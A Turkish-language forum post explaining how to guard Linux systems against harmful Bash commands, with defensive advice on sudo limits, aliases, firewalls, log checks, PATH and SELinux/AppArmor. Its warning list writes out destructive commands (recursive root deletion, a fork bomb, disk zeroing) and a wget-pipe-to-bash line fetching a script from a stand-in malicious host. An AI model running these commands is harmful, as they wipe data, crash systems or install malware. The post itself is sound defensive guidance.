Bash Shell Zararlı Komutlardan Korunma Yöntemleri

0 Replies 156 Views
·

Leave a rating: Bash Shell Zararlı Komutlardan Korunma Yöntemleri

You have already rated this thread. Re-rating it will remove your existing rating or review.

Rating:

Raters: Bash Shell Zararlı Komutlardan Korunma Yöntemleri

Participants
Thread Starter #0

Zararlı Bash Komutları Nelerdir?


Bash shell üzerinden çalıştırılan bazı komutlar, istemeden sistemde büyük hasarlara neden olabilir. İşte dikkat edilmesi gereken bazı örnekler:


  • rm -rf / : Tüm dosya sistemini siler.
  • :(){ :|:& };: : Fork bomb adı verilen sistem kilitleyici bir komut.
  • dd if=/dev/zero of=/dev/sda : Sabit diski tamamen sıfırlar.
  • wget http://zararlı.com/malware.sh | bash : İnternetten zararlı bir betik indirip çalıştırır.

Bu gibi komutlar, sistemin çökmesine veya veri kaybına neden olabilir.




Zararlı Komutlardan Korunma Yöntemleri


1. Root Yetkilerini Sınırlayın


Root hesabı ile yapılan işlemler sistemi doğrudan etkiler. Bu nedenle:


  • Kullanıcıların sudo ile yetkilendirilmesi tercih edilmeli.
  • Her kullanıcıya minimum yetki verilmeli.

2. Bash Alias Kullanarak Tehlikeli Komutları Engelleyin


Tehlikeli komutlar için alias tanımlayarak yanlışlıkla çalıştırılmalarının önüne geçilebilir:

BASH
123alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'


3. Güvenlik Duvarı ve IDS/IPS Sistemleri Kullanın


Zararlı komutların dış ağdan tetiklenmesini engellemek için firewall, Snort, Fail2ban gibi sistemler devreye alınabilir.


4. Bash Betiklerini ve Logları Denetleyin


  • ~/.bash_history ve /var/log/auth.log gibi log dosyaları düzenli kontrol edilmelidir.
  • Otomatik script'lerin içeriği manuel olarak incelenmeli.

5. PATH Değerlerini Güvenli Tutun


Zararlı yazılımlar, sahte ls, cd, rm gibi komutlarla kullanıcıyı kandırabilir. Bu nedenle $PATH değişkeni şu şekilde temiz tutulmalıdır:


BASH
1export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin


6. SELinux ve AppArmor Kullanın


SELinux veya AppArmor gibi güvenlik modülleriyle uygulamaların sistem kaynaklarına erişimi sınırlandırılabilir.
[IMG width="249px" size="1050x1050"]https://i.hizliresim.com/a6d55tm.png[/IMG]

You must be logged in to reply.

0 quotes selected